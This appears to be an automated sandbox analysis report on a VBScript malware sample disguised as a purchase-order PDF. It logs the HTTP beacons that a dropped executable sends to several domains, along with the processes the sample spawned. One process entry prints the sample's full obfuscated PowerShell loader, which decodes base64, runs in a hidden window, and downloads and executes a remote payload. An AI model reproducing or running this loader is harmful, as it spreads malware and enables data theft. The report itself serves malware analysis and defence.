                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; Nexus 5 Build/LRX22C) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Nov 14, 2024 08:17:09.632874012 CET | 427 | IN | HTTP/1.1 404 Not Found
                                                                                        Date: Thu, 14 Nov 2024 07:17:09 GMT
                                                                                        Server: Apache
                                                                                        Content-Length: 263
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.5 | 63495 | 203.161.46.205 | 80 | 3720 | C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 08:17:15.874260902 CET | 761 | OUT | POST /gdpp/ HTTP/1.1
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Host: www.nimil.info
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Length: 205
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Origin: http://www.nimil.info
                                                                                        Referer: http://www.nimil.info/gdpp/
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; Nexus 5 Build/LRX22C) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                        Data Ascii: qb6h=aPNrmElqyG/ebDPaA2iHE5WZEYE/Gj2yLMWPKmhs/KclR7TNiQhBJ4QULgUlOTXt/ZzgxfJXPhgTnXi+X3CNZlRw6dsCI+tvtIqZGRDGAsaDRoFPZ6hOehs7muhmaHpCRooWw8NmDrw0hXVvyvMMmxIt0t/4uOQLPMB/B2ljnqyCxfPTIgBvmIDk3U15M6vJtkCW8hM=
Nov 14, 2024 08:17:16.548337936 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                        Date: Thu, 14 Nov 2024 07:17:16 GMT
                                                                                        Server: Apache
                                                                                        Content-Length: 16052
                                                                                        Connection: close
                                                                                        Content-Type: text/html
                                                                                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.5 | 63496 | 203.161.46.205 | 80 | 3720 | C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 08:17:18.433614969 CET | 781 | OUT | POST /gdpp/ HTTP/1.1
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Host: www.nimil.info
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Length: 225
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Origin: http://www.nimil.info
                                                                                        Referer: http://www.nimil.info/gdpp/
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; Nexus 5 Build/LRX22C) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                        Data Ascii: qb6h=aPNrmElqyG/eaifaQlaHN5Wed4E/ND22LMKPKnVa/54lRZ7NjVNBAoQUFAVhWzXm/Z3Cxf1XPhcTnV6+XE6MZ1R2y9sAM+tvtIqZGRXsAsSDSZ1PYbhNTBs0huhmMHpORoo4w5xfDp40hXlvz7R+sxIR6N+J9MhuJNFRMw48xK2cwp+5SCJH1ovcnH9OdKOg3HSmi2Z4Mav6HsRfF+3G8tC5hCKd
Nov 14, 2024 08:17:19.096184969 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                        Date: Thu, 14 Nov 2024 07:17:19 GMT
                                                                                        Server: Apache
                                                                                        Content-Length: 16052
                                                                                        Connection: close
                                                                                        Content-Type: text/html
                                                                                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.5 | 63497 | 203.161.46.205 | 80 | 3720 | C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 08:17:20.981636047 CET | 1798 | OUT | POST /gdpp/ HTTP/1.1
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Host: www.nimil.info
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Length: 1241
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Origin: http://www.nimil.info
                                                                                        Referer: http://www.nimil.info/gdpp/
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; Nexus 5 Build/LRX22C) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                        Data Ascii: qb6h=aPNrmElqyG/eaifaQlaHN5Wed4E/ND22LMKPKnVa/5wlRqDNiy5BaoQUNgVsWzX7/ZPGxf4iPnQTm2y+fV6MMFR2w9sDI+t6tI6dGRHsAsSDSadPfKhNVBs7mugnaHonRowOw4FPfN00h31vxI5+xhIp9N+R9Mt9JNJ3MwkaxImcx4HAJwhR2a6wkw1cafqcoUiPuFtMIoCYJJljB+/IoIy5nS3+wZ8cTXyEvoTTI2/r2tDLfjHjGCM5hagL+/w3FjBTBhRhlTCJofwpqnpF/tY1GAhByXYbs7SBfDdEIwacuGUk6ZSV/WPtrG2oinXY0v/B6GsKCoelLc5YuuOV5jIgtSz+L7wj4kUcr/YMQlwg7/dhzAc10iRtSZfUL2rprsl2MQ/3Ywf4iOZZ+gFy6Wx9JMFP+BKcAFH4UvXuatX/lg50kdcTme1JWdpErq6rYLxCyXs9+dxG3MR1mXHhliKWcQTlfsflNrV3XvAVZF3YAbSag5M8Dscy4rf2EOO7GLTS7K9ARcMxwKbb7yyXdQoeugAZ6Hd7z1Pq89naT6GEFrQTNka0PCul807p2K9gS+fRm8tQS5tFSNqf9h+EORTtge/mPzA5SRPYa0Y46su+C33wroCYBCbjPGE0BmG3bsL9za8J4j9n4xTzpnEo3ppo3hDUhPh0uDEY/c78fLpU539HP8uVT8idz/JVByo4UyuejrYWjKx9ohX2r0rg7/qJ2JUH0Up+S+QJGM+zODKYQGkJW8qzNyyBC0dqC+9N058tKVyoqPbCIdFMnj8uwY/rCdyRJ+O47cWF0J99pa9vRA5L93uSSnqR6JST4qcJW90p80S1oOdoVFc6kSLdRJWTXJYP11B9i5ApILPWpJ+vCOgPSsu/2EzAvxtLxLxJeAVUPf579R9mRV7LphXBppAkHQoYtjLQpsW+i/8e2A6j44H4YsZ6qxVGu/lxLiPWmuTvkdBYYjAUpPjaUrUdqehA8o09hjvDK+YwWjHpNFFeM7m [TRUNCATED]
Nov 14, 2024 08:17:21.645406008 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                        Date: Thu, 14 Nov 2024 07:17:21 GMT
                                                                                        Server: Apache
                                                                                        Content-Length: 16052
                                                                                        Connection: close
                                                                                        Content-Type: text/html


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.5 | 63498 | 203.161.46.205 | 80 | 3720 | C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe

Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 08:17:23.520235062 CET | 509 | OUT | GET /gdpp/?X8wps=HD9ptle8L&qb6h=XNlLlzJ611biWBDnQnCeFZ6NVZ4xLjWXfr+0L15v/dkoQ7LxqA4db7MsNS0iTnnZ4s3kssINbHg5oGi7TlfLVlZQ57t8NMxb4MyHODvld5yYZYMDALlCTAgJ47pyJF8rKg== HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Host: www.nimil.info
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; Nexus 5 Build/LRX22C) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Nov 14, 2024 08:17:24.176939964 CET | 1236 | IN | HTTP/1.1 404 Not Found
Date: Thu, 14 Nov 2024 07:17:24 GMT
Server: Apache
Content-Length: 16052
Connection: close
Content-Type: text/html; charset=utf-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.5 | 63499 | 161.97.142.144 | 80 | 3720 | C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe

Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 08:17:29.398915052 CET | 770 | OUT | POST /wrcq/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Host: www.030002350.xyz
Cache-Control: no-cache
Connection: close
Content-Length: 205
Content-Type: application/x-www-form-urlencoded
Origin: http://www.030002350.xyz
Referer: http://www.030002350.xyz/wrcq/
User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; Nexus 5 Build/LRX22C) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Nov 14, 2024 08:17:30.228550911 CET | 1236 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 14 Nov 2024 07:17:30 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
ETag: W/"66cce1df-b96"
Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.5 | 63500 | 161.97.142.144 | 80 | 3720 | C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe

Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 08:17:31.956199884 CET | 790 | OUT | POST /wrcq/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Host: www.030002350.xyz
Cache-Control: no-cache
Connection: close
Content-Length: 225
Content-Type: application/x-www-form-urlencoded
Origin: http://www.030002350.xyz
Referer: http://www.030002350.xyz/wrcq/
User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; Nexus 5 Build/LRX22C) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Nov 14, 2024 08:17:32.779705048 CET | 1236 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 14 Nov 2024 07:17:32 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
ETag: W/"66cce1df-b96"
Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.5 | 63501 | 161.97.142.144 | 80 | 3720 | C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 08:17:34.510745049 CET | 1807 | OUT | POST /wrcq/ HTTP/1.1
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Host: www.030002350.xyz
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Length: 1241
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Origin: http://www.030002350.xyz
                                                                                        Referer: http://www.030002350.xyz/wrcq/
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; Nexus 5 Build/LRX22C) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Nov 14, 2024 08:17:35.345726967 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                        Server: nginx
                                                                                        Date: Thu, 14 Nov 2024 07:17:35 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        ETag: W/"66cce1df-b96"
                                                                                        Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.5 | 63502 | 161.97.142.144 | 80 | 3720 | C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 08:17:37.050401926 CET | 512 | OUT | GET /wrcq/?qb6h=0aBKMIuxMWsDZlZuGCNWGAisa+F3tvB0xMbS2kgCUdLh7rFDbnNAXehk8UbfWJO3lEanFmC09f09BQpsWN4gqHRUU5ElviQXwZTk2Xd/dFN8TxdFGzfCv1WAKHEC3ArfOQ==&X8wps=HD9ptle8L HTTP/1.1
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                        Host: www.030002350.xyz
                                                                                        Connection: close
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; Nexus 5 Build/LRX22C) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Nov 14, 2024 08:17:37.892884970 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                        Server: nginx
                                                                                        Date: Thu, 14 Nov 2024 07:17:37 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Content-Length: 2966
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        ETag: "66cce1df-b96"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49705 | 185.199.111.133 | 443 | 3292 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-14 07:15:40 UTC | 116 | OUT | GET /richie213/ani/refs/heads/main/jdikobc.txt HTTP/1.1
                                                                                        Host: raw.githubusercontent.com
                                                                                        Connection: Keep-Alive
2024-11-14 07:15:40 UTC | 903 | IN | HTTP/1.1 200 OK
                                                                                        Connection: close
                                                                                        Content-Length: 410144
                                                                                        Cache-Control: max-age=300
                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                        ETag: "9576ae1b4136ae2341c8262bb1d980c8944d974306f8fc309ee99e9bf2ccff21"
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-Frame-Options: deny
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        X-GitHub-Request-Id: 610D:2D7EE0:539AFE:5BECC5:6735A39C
                                                                                        Accept-Ranges: bytes
                                                                                        Date: Thu, 14 Nov 2024 07:15:40 GMT
                                                                                        Via: 1.1 varnish
                                                                                        X-Served-By: cache-dfw-kdal2120043-DFW
                                                                                        X-Cache: MISS
                                                                                        X-Cache-Hits: 0
                                                                                        X-Timer: S1731568540.249169,VS0,VE250
                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                        X-Fastly-Request-ID: 95fe83dfc5f9ab631699e20e28ba6a2dfa293e81
                                                                                        Expires: Thu, 14 Nov 2024 07:20:40 GMT
                                                                                        Source-Age: 0



                                                                                        Target ID:0
                                                                                        Start time:02:15:29
                                                                                        Start date:14/11/2024
                                                                                        Path:C:\Windows\System32\wscript.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-DC13112024_pdf.vbs"
                                                                                        Imagebase:0x7ff72cc30000
                                                                                        File size:170'496 bytes
                                                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:2
                                                                                        Start time:02:15:30
                                                                                        Start date:14/11/2024
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Go$ZgBn$Gs$ZgBn$Gg$Zg$v$HM$ZwBz$GQ$ZwBo$HM$Z$Bm$HM$LwBk$G8$dwBu$Gw$bwBh$GQ$cw$v$G4$ZQB3$F8$aQBt$Gc$LgBq$H$$Zw$/$DE$Mw$0$DE$NQ$n$Cw$I$$n$Gg$d$B0$H$$Og$v$C8$MQ$w$DM$Lg$y$D$$Lg$x$D$$Mg$u$DY$Mg$v$G4$ZQB3$F8$aQBt$Gc$LgBq$H$$Zw$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$9$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$$k$Gw$aQBu$Gs$cw$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$LQBu$GU$I$$k$G4$dQBs$Gw$KQ$g$Hs$I$$k$Gk$bQBh$Gc$ZQBU
$GU$e$B0$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBU$GU$e$B0$C4$RQBu$GM$bwBk$Gk$bgBn$F0$Og$6$FU$V$BG$Dg$LgBH$GU$d$BT$HQ$cgBp$G4$Zw$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$FM$V$BB$FI$V$$+$D4$Jw$7$C$$J$Bl$G4$Z$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$RQBO$EQ$Pg$+$Cc$Ow$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$KQ$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bl$G4$Z$BG$Gw$YQBn$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$C0$ZwBl$C$$M$$g$C0$YQBu$GQ$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$ZwB0$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Ck$I$B7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$Kw$9$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bi$GE$cwBl$DY$N$BM$GU$bgBn$HQ$a$$g$D0$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$I$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$GI$YQBz$GU$Ng$0$EM$bwBt$G0$YQBu$GQ$I$$9$C$$J$Bp$G0$YQBn$GU$V$Bl$Hg$d$$u$FM$dQBi$HM$d$By$Gk$bgBn$Cg$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Cw$I$$k$GI$YQBz$GU$Ng$0$Ew$ZQBu$Gc$d$Bo$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$GM$bwBt$G0$YQBu$GQ$QgB5$HQ$ZQBz$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBD$G8$bgB2$GU$cgB0$F0$Og$6$EY$cgBv$G0$QgBh$HM$ZQ$2$DQ$UwB0$HI$aQBu$Gc$K$$k$GI$YQBz$GU$Ng$0$EM$bwBt$G0$YQBu$GQ$KQ$7$C$$J$Bs$G8$YQBk$GU$Z$BB$HM$cwBl$G0$YgBs$Hk$I$$9$C$$WwBT$Hk$cwB0$GU$bQ$u$FI$ZQBm$Gw$ZQBj$HQ$aQBv$G4$LgBB$HM$cwBl$G0$YgBs$Hk$XQ$6$Do$T$Bv$GE$Z$$o$CQ$YwBv$G0$bQBh$G4$Z$BC$Hk$d$Bl$HM$KQ$7$C$$J$B0$Hk$c$Bl$C$$PQ$g$CQ$b$Bv$GE$Z$Bl$GQ$QQBz$HM$ZQBt$GI$b$B5$C4$RwBl$HQ$V$B5$H$$ZQ$o$Cc$d$Bl$HM$d$Bw$G8$dwBl$HI$cwBo$GU$b$Bs$C4$S$Bv$G0$ZQ$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bt$GU$d$Bo$G8$Z$$g$D0$I$$k$HQ$eQBw$GU$LgBH$GU$d$BN$GU$d$Bo$G8$Z$$o$Cc$b$Bh$Cc$KQ$u$Ek$bgB2$G8$awBl$Cg$J$Bu$HU$b$Bs$Cw$I$Bb$G8$YgBq$GU$YwB0
$Fs$XQBd$C$$K$$n$HQ$e$B0$C4$YwBi$G8$awBp$GQ$ag$v$G4$aQBh$G0$LwBz$GQ$YQBl$Gg$LwBz$GY$ZQBy$C8$aQBu$GE$Lw$z$DE$MgBl$Gk$a$Bj$Gk$cg$v$G0$bwBj$C4$d$Bu$GU$d$Bu$G8$YwBy$GU$cwB1$GI$dQBo$HQ$aQBn$C4$dwBh$HI$Lw$v$Do$cwBw$HQ$d$Bo$Cc$L$$g$Cc$M$$n$Cw$I$$n$FM$d$Bh$HI$d$B1$H$$TgBh$G0$ZQ$n$Cw$I$$n$FI$ZQBn$EE$cwBt$Cc$L$$g$Cc$M$$n$Ck$KQB9$H0$';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('$','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
                                                                                        Imagebase:0x7ff7be880000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:3
                                                                                        Start time:02:15:30
                                                                                        Start date:14/11/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff6d64d0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:4
                                                                                        Start time:02:15:32
                                                                                        Start date:14/11/2024
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
